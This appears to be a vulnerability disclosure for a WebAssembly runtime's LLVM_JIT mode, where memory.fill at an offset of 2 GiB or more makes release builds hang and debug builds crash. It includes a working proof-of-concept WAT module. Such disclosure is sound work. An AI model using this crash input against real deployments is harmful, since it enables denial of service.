Summary

Details

Found that LLVM_JIT mode does not terminate properly when executing a wasm program that contains a specific case. However FAST_JIT mode and other runtime tools can be executed and exited normally.

In this case, the program contains the memory.fill directive. And the first operand of the instruction, that is, the pointer to the region to update, when the range is greater than or equal to 2 GiB (2147483648 Bytes). When the range is less than 2GiB, it exits normally.

Note: The operation scope of memory.fill here does not exceed the memory range of the wasm module, otherwise out of bounds memory access will appear.

PoC

(module
  (type (;0;) (func (param i32)))
  (type (;1;) (func))
  (type (;2;) (func (result i32)))
  (import "wasi_snapshot_preview1" "proc_exit" (func (;0;) (type 0)))
  (func (;1;) (type 1))
  (func (;2;) (type 1)
    (local i32)
    (memory.fill
      (i32.const 2147483648)
      (i32.const 217)
      (i32.const 1))
    (call 0
      (i32.const 0))
    (unreachable))
  (table (;0;) 2 2 funcref)
  (memory (;0;) 57491 57491)
  (global (;0;) (mut i32) (i32.const 66576))
  (export "memory" (memory 0))
  (export "__indirect_function_table" (table 0))
  (export "_start" (func 2))
  (elem (;0;) (i32.const 1) func 1))

When first parameter >= 2GiB in memory.fill, it will be reproduced.

Impact

This is caused by a bug in the program, which leads to accessing an invalid pointer. The release version will hang and the debug version will crash.